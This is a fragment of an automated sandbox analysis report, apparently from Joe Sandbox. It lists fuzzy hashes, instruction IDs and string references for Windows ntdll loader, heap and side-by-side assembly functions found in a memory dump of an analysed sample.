                                            • Instruction ID: ba9f0d79ffb40c63649aff7258dd4d1625fe3dfe4d619c9436a8074bbd5fff61
                                            • Opcode Fuzzy Hash: 8fad858edfea512346484bc1c7bd1fe8311c12abe0061c5bdf636e16d058d6f9
                                            • Instruction Fuzzy Hash: 409123B2A09702EFD762DF2AC980B6B77E9AB94B14F05041CFE496B241D778EC05C791
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                            • API String ID: 0-1109411897
                                            • Opcode ID: 7a4f4ee729f67654c9b4c54c8485d8e9ba84539f22e627ce631c66779bd2762d
                                            • Instruction ID: 968a481a96634e1cb5b9dcb825774133842d8a4bf43891430ea9d5fbe2806f00
                                            • Opcode Fuzzy Hash: 7a4f4ee729f67654c9b4c54c8485d8e9ba84539f22e627ce631c66779bd2762d
                                            • Instruction Fuzzy Hash: 8EA24E74A056298FDB65CF19CD88BADBBB5BF89304F1482E9E50DA7251DB349E81CF00
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-792281065
                                            • Opcode ID: c6b710a8c54a41c46a0380737dd799552ccc60418eb4699091c11d40200360f7
                                            • Instruction ID: 1689b2d523880a5cc795b0333d97dae1b75922927b9caa9a4a9a039296ad03ea
                                            • Opcode Fuzzy Hash: c6b710a8c54a41c46a0380737dd799552ccc60418eb4699091c11d40200360f7
                                            • Instruction Fuzzy Hash: 42914D70F003159FEB36DF58EA84BAA7BB1FF94B18F154129E5086B2C2D775A802C791
                                            Strings
                                            • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01A29A01
                                            • apphelp.dll, xrefs: 019C6496
                                            • minkernel\ntdll\ldrinit.c, xrefs: 01A29A11, 01A29A3A
                                            • LdrpInitShimEngine, xrefs: 01A299F4, 01A29A07, 01A29A30
                                            • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01A29A2A
                                            • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 01A299ED
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-204845295
                                            • Opcode ID: 2f729f4f6922ceb7a81c12092485bb7087a75ebfa177190855ce6e0f9b48c80a
                                            • Instruction ID: 47f28e9d4464f859a19eabe231900acb9cbdc218f80855b8ce4c9c42165608f9
                                            • Opcode Fuzzy Hash: 2f729f4f6922ceb7a81c12092485bb7087a75ebfa177190855ce6e0f9b48c80a
                                            • Instruction Fuzzy Hash: 3251BF716083149FE721DF28D985AAB77E8FFC4B48F14491DF589972A0D630E905CB93
                                            Strings
                                            • minkernel\ntdll\ldrredirect.c, xrefs: 01A48181, 01A481F5
                                            • minkernel\ntdll\ldrinit.c, xrefs: 01A0C6C3
                                            • LdrpInitializeImportRedirection, xrefs: 01A48177, 01A481EB
                                            • Unable to build import redirection Table, Status = 0x%x, xrefs: 01A481E5
                                            • LdrpInitializeProcess, xrefs: 01A0C6C4
                                            • Loading import redirection DLL: '%wZ', xrefs: 01A48170
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                            • API String ID: 0-475462383
                                            • Opcode ID: 92132bdbf6474fcb733faa0039ab56eda0b307146097f3d621354e8f0db6cec5
                                            • Instruction ID: 99ea1a669e5dd2727031a7572e9d30e92da6e815ef3539bc626aed25b6163d7f
                                            • Opcode Fuzzy Hash: 92132bdbf6474fcb733faa0039ab56eda0b307146097f3d621354e8f0db6cec5
                                            • Instruction Fuzzy Hash: 81312771744302AFC224EF68EE46E2A77E4FFD4B20F05055CF9486B295E620EC04C7A2
                                            Strings
                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 01A421BF
                                            • RtlGetAssemblyStorageRoot, xrefs: 01A42160, 01A4219A, 01A421BA
                                            • SXS: %s() passed the empty activation context, xrefs: 01A42165
                                            • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01A42178
                                            • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01A42180
                                            • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 01A4219F
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                            • API String ID: 0-861424205
                                            • Opcode ID: b532928f8b6c9329ea22ec0dc9077ff3ce271e60b600d80aa22e6f04f48ad9d4
                                            • Instruction ID: e3ec48d875530fa7fdcfd4ae9f38f7b4535cd630fe021650975cf5c9b0987e3d
                                            • Opcode Fuzzy Hash: b532928f8b6c9329ea22ec0dc9077ff3ce271e60b600d80aa22e6f04f48ad9d4
                                            • Instruction Fuzzy Hash: CE312B76F403157BF7228A9AAD85FAF7B78DBD4B90F05015BBB0877180D2709A00C7A1
                                            APIs
                                              • Part of subcall function 01A12DF0: LdrInitializeThunk.NTDLL ref: 01A12DFA
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A10BA3
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A10BB6
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A10D60
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A10D74
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                            • String ID:
                                            • API String ID: 1404860816-0
                                            • Opcode ID: 03a2bcb0d8fecec6182a77927949690984b6be6c9cba9fdf85cd310a9207997d
                                            • Instruction ID: 67362d918a0d9bb40659a7c954f3d9b128f29fe6ea647fbb1b85c6bcfe312b83
                                            • Opcode Fuzzy Hash: 03a2bcb0d8fecec6182a77927949690984b6be6c9cba9fdf85cd310a9207997d
                                            • Instruction Fuzzy Hash: FC427C75900705DFDB21CF28C980BAAB7F5BF48314F1485AAE989DB245D770EA85CF60
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                            • API String ID: 0-379654539
                                            • Opcode ID: e8900a0951b2430132872e022b560742d23bdea7eb3a114e7daed52532fd6987
                                            • Instruction ID: 9f091adef4941438dde8b2b93e8e8cad907a79718e3c7e745e41bf8893375c19
                                            • Opcode Fuzzy Hash: e8900a0951b2430132872e022b560742d23bdea7eb3a114e7daed52532fd6987
                                            • Instruction Fuzzy Hash: 4CC19C74208386CFD721CF58C144B6AB7E4FF84704F04896AF999CB291E738CA59CB56
                                            Strings
                                            • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 01A0855E
                                            • @, xrefs: 01A08591
                                            • minkernel\ntdll\ldrinit.c, xrefs: 01A08421
                                            • LdrpInitializeProcess, xrefs: 01A08422
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-1918872054
                                            • Opcode ID: 09714579953658d79de7e3a25d96fb2f7a5f773de233d711ec45d64bb09cddf8
                                            • Instruction ID: 39ebb8ffcb003506b1239d3d04da09668e86cdee4aaa71234e934141b0c85d0f
                                            • Opcode Fuzzy Hash: 09714579953658d79de7e3a25d96fb2f7a5f773de233d711ec45d64bb09cddf8
                                            • Instruction Fuzzy Hash: E891AF71908345AFD722EF65CD41FABBBE8BF84744F40092EFA8892151E735E904CB66
                                            Strings
                                            • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 01A421D9, 01A422B1
                                            • SXS: %s() passed the empty activation context, xrefs: 01A421DE
                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 01A422B6
                                            • .Local, xrefs: 01A028D8
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                            • API String ID: 0-1239276146
                                            • Opcode ID: b5464db8bd8c3ee2c7567730aecb44a3c5a7154f27abd1c6663b71a37c5f3cc7
                                            • Instruction ID: cbf30418ce6985b7fa5afc2daeff9631f6db145a1d737e2a1af84a94b0ecf691
                                            • Opcode Fuzzy Hash: b5464db8bd8c3ee2c7567730aecb44a3c5a7154f27abd1c6663b71a37c5f3cc7
                                            • Instruction Fuzzy Hash: 4FA19535940329DFDB26CF58E888BA9B7B5BF58354F1541EAE908E7291D7309E80CF90
                                            Strings
                                            • RtlDeactivateActivationContext, xrefs: 01A43425, 01A43432, 01A43451
                                            • SXS: %s() called with invalid flags 0x%08lx, xrefs: 01A4342A
                                            • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01A43456
                                            • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01A43437
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                            • API String ID: 0-1245972979
                                            • Opcode ID: 3dfd4c712f5e280932bff88ad8c08c0786fab043d187f4d7e5085db3f32422be
                                            • Instruction ID: e5fe8df502f9756a69c825f5bf2475744bd6077ab135eb368248b1f34a1a5009
                                            • Opcode Fuzzy Hash: 3dfd4c712f5e280932bff88ad8c08c0786fab043d187f4d7e5085db3f32422be
                                            • Instruction Fuzzy Hash: DA613372600B229FDB23CF1DD981B6AB7E0FFC4B61F198519EA559B281C734E801CB91
                                            Strings
                                            • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01A31028
                                            • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 01A3106B
                                            • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01A30FE5
                                            • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 01A310AE
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                            • API String ID: 0-1468400865
                                            • Opcode ID: 75a9f8ecdf2b6b8411cbb525bad3a27bb9c5d8ba18489704d8e9318057621fc4
                                            • Instruction ID: b0ae80e49dcb077ae6b99223993e49b39852af80830398dc5ef6b29e9eeb4f8c
                                            • Opcode Fuzzy Hash: 75a9f8ecdf2b6b8411cbb525bad3a27bb9c5d8ba18489704d8e9318057621fc4
                                            • Instruction Fuzzy Hash: 6471D0B19043059FCB21DF18C984F9B7FA8EF94764F404869F9488B24AD738D588CBD2
                                            Strings
                                            • LdrpDynamicShimModule, xrefs: 01A3A998
                                            • apphelp.dll, xrefs: 019F2462
                                            • minkernel\ntdll\ldrinit.c, xrefs: 01A3A9A2
                                            • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 01A3A992
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-176724104
                                            • Opcode ID: 003a55e251946c481c0ad89a6029488c6741a98d540753bfd7c9bb96239ff416
                                            • Instruction ID: d7c644ffef57bab0b4eafe9ecb1054b56def7ed1930ad202df60763622b1bb43
                                            • Opcode Fuzzy Hash: 003a55e251946c481c0ad89a6029488c6741a98d540753bfd7c9bb96239ff416
                                            • Instruction Fuzzy Hash: C231237AA00211AFDB32DF59D885BAA7BB4FFC4B04F16405DF955E7245C7B09842C780
                                            Strings
                                            • HEAP: , xrefs: 019E3264
                                            • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 019E327D
                                            • HEAP[%wZ]: , xrefs: 019E3255
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                            • API String ID: 0-617086771
                                            • Opcode ID: e531e6d92d1420daa2e4c6399e202057e7e122d44b3cb625248299ef64fc13c4
                                            • Instruction ID: 91fbec3f4d64379778c4f55c82891362d6d9bde0bd8881ba84965cf19ad3554a
                                            • Opcode Fuzzy Hash: e531e6d92d1420daa2e4c6399e202057e7e122d44b3cb625248299ef64fc13c4
                                            • Instruction Fuzzy Hash: 8292CE71A042499FEB26CF68C448BAEBBF5FF49310F18849DE849AB391D735A941CF50
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                            • API String ID: 0-4253913091
                                            • Opcode ID: 8296bc94aaba1fac6062f7181cee2fdc8df0d01cfca2306ebec88156fefb31d7
                                            • Instruction ID: 71632c38287dc0960266b0d567454de00f05d0d98598c453f35c3af968518049
                                            • Opcode Fuzzy Hash: 8296bc94aaba1fac6062f7181cee2fdc8df0d01cfca2306ebec88156fefb31d7
                                            • Instruction Fuzzy Hash: F5F18B30B00606DFEB26CF68C998B6AB7F5FB84304F184569F45A9B381D774E981CB91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID: $@
                                            • API String ID: 2994545307-1077428164
                                            • Opcode ID: 0169d97918deb5bd34a976d1ef9c6283c3783cc04d588f4c5c0806b8b143448e
                                            • Instruction ID: 40f2e6880e8b0bcc64319413fe7684673072fa73ae3eaf39cb767aa5f886ae7f
                                            • Opcode Fuzzy Hash: 0169d97918deb5bd34a976d1ef9c6283c3783cc04d588f4c5c0806b8b143448e
                                            • Instruction Fuzzy Hash: D8C28071608341AFE729CF68C841BABBBE5AFC8754F04892EFA89D7241D734D845CB52
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: FilterFullPath$UseFilter$\??\
                                            • API String ID: 0-2779062949
                                            • Opcode ID: 1eca5122f1a6265128f033cc166184518c9ebfed0aac72389106c118ee5bfd6d
                                            • Instruction ID: fb7339188734ce4de3a5ffa89074870f01fa45dc43bdcbb078cb510c35efa158
                                            • Opcode Fuzzy Hash: 1eca5122f1a6265128f033cc166184518c9ebfed0aac72389106c118ee5bfd6d
                                            • Instruction Fuzzy Hash: 18A13A759116399BDB219B68CC88BAEB7B8EF44710F1001EAEA0DA7251E7359E84CF50
                                            Strings
                                            • LdrpCheckModule, xrefs: 01A3A117
                                            • minkernel\ntdll\ldrinit.c, xrefs: 01A3A121
                                            • Failed to allocated memory for shimmed module list, xrefs: 01A3A10F
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-161242083
                                            • Opcode ID: a21622f33f1b5ff7c5dd81fb2e46c1e483cd69f210f97f63da3762695757f358
                                            • Instruction ID: 2db4b9712fe12405517e4029b8fdf16e03f582db46c11065211d0a072538d6fb
                                            • Opcode Fuzzy Hash: a21622f33f1b5ff7c5dd81fb2e46c1e483cd69f210f97f63da3762695757f358
                                            • Instruction Fuzzy Hash: 2971DF75E00305AFDB25DF68C981BAEB7F9FB88304F18842DE94AD7256D734A942CB41
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                            • API String ID: 0-1334570610
                                            • Opcode ID: 93c7ef75053662888884c8e159f29406375a17c59d399a53dea1336eb2ff5011
                                            • Instruction ID: 3c04b8f73fb2d1fe67463dcbfad6ff3975daa155dc4266ae6558851015a2d25c
                                            • Opcode Fuzzy Hash: 93c7ef75053662888884c8e159f29406375a17c59d399a53dea1336eb2ff5011
                                            • Instruction Fuzzy Hash: 7861A071B00305DFDB2ACF28C559B6ABBE5FF84704F188559F4998B292D7B0E881CB91
                                            Strings
                                            • minkernel\ntdll\ldrinit.c, xrefs: 01A482E8
                                            • LdrpInitializePerUserWindowsDirectory, xrefs: 01A482DE
                                            • Failed to reallocate the system dirs string !, xrefs: 01A482D7
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-1783798831
                                            • Opcode ID: c29cb5be51b7aa3d595613c8263abc2a116609e53f77c557bd830dd068e11f38
                                            • Instruction ID: 7cee907a1de287f39050c1814bd9e32d74b587959139d6d27580029954d51d25
                                            • Opcode Fuzzy Hash: c29cb5be51b7aa3d595613c8263abc2a116609e53f77c557bd830dd068e11f38
                                            • Instruction Fuzzy Hash: D641F375544301AFD722EB68ED44B5B77E8FF84B64F044A2AF948D3294EB74E801CB91
                                            Strings
                                            • PreferredUILanguages, xrefs: 01A8C212
                                            • @, xrefs: 01A8C1F1
                                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 01A8C1C5
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                            • API String ID: 0-2968386058
                                            • Opcode ID: e77e5ee7ce97bbb76dc8085442ea2e1e2228c3fdeb95aebc8f486b340c403f41
                                            • Instruction ID: 01947eea3fab42db0dafe04e6660c6c237c8c33818854c9ddbfbd3fc47ce6287
                                            • Opcode Fuzzy Hash: e77e5ee7ce97bbb76dc8085442ea2e1e2228c3fdeb95aebc8f486b340c403f41
                                            • Instruction Fuzzy Hash: 28417671D00219EBDF11FBD8C881FEEB7B8AB54710F14416AE609B7284E7749A44CF60
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                            • API String ID: 0-1373925480
                                            • Opcode ID: 08d17eb6700fe776fa5dfadae13a5a7282b5b2f4b4629b5bb35080cb1adea40f
                                            • Instruction ID: 81fba93c8bda87f00078864d543bb5ebbf4ca99fc9ab7516eb1d65739c083688
                                            • Opcode Fuzzy Hash: 08d17eb6700fe776fa5dfadae13a5a7282b5b2f4b4629b5bb35080cb1adea40f
                                            • Instruction Fuzzy Hash: 5141EF71A04758CBEB26DBE9C944BADBBF8FF99340F28045AD905AB781D7358941CB10
                                            Strings
                                            • minkernel\ntdll\ldrredirect.c, xrefs: 01A54899
                                            • LdrpCheckRedirection, xrefs: 01A5488F
                                            • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01A54888
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                            • API String ID: 0-3154609507
                                            • Opcode ID: cfce4bb5bbae86223a7a2633ec222543e266c3a07c42c9c10240043ea4f79282
                                            • Instruction ID: 435f84d803d047ae91bb6483336acc41ea0046d2d58609134910095b68d774da
                                            • Opcode Fuzzy Hash: cfce4bb5bbae86223a7a2633ec222543e266c3a07c42c9c10240043ea4f79282
                                            • Instruction Fuzzy Hash: 0E41CF32A087519FCBA2CF69D940A667BE4AF8DA50F0A056DED5897311F731E880CB91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                            • API String ID: 0-2558761708
                                            • Opcode ID: 877027cd495495d70b926b86b82b4484bd704908c88c805173226bf3458864d3
                                            • Instruction ID: f7127984684a5277da8bb5938318d16d9d7d59b6a3a307ec0fa7abb8835d6912
                                            • Opcode Fuzzy Hash: 877027cd495495d70b926b86b82b4484bd704908c88c805173226bf3458864d3
                                            • Instruction Fuzzy Hash: 8A1190317151429FEF2ECA18C455B65B7E9FF80A16F1D811DF40ACB252D770D845C751
                                            Strings
                                            • LdrpInitializationFailure, xrefs: 01A520FA
                                            • Process initialization failed with status 0x%08lx, xrefs: 01A520F3
                                            • minkernel\ntdll\ldrinit.c, xrefs: 01A52104
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-2986994758
                                            • Opcode ID: be3b5b10019357bfdc5efc3b4002fb7b5945e52f2bfd78768e464eb1da9248e0
                                            • Instruction ID: 5654b898384dea8a611a41f5271d14ecc472b87d05ee439fdc8146a0f1482166
                                            • Opcode Fuzzy Hash: be3b5b10019357bfdc5efc3b4002fb7b5945e52f2bfd78768e464eb1da9248e0
                                            • Instruction Fuzzy Hash: E3F0C279640308BFEB24E74DEE46FDA7B68FB80B54F140069FA046B685D2B0A901CA91
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: #%u
                                            • API String ID: 48624451-232158463
                                            • Opcode ID: 3c523d8f04028ee3900fa54e171e302929294b42fb39ae9acd65a221b9d3c099
                                            • Instruction ID: 36f50d349b68ae8e8d5260a2ade80715cfd5c9196f66e2312c7967e367a3e091
                                            • Opcode Fuzzy Hash: 3c523d8f04028ee3900fa54e171e302929294b42fb39ae9acd65a221b9d3c099
                                            • Instruction Fuzzy Hash: C2714A71A0014A9FDB02DFA8CA94FAEBBF8FF48744F144065E905E7251EA34EE45CB60
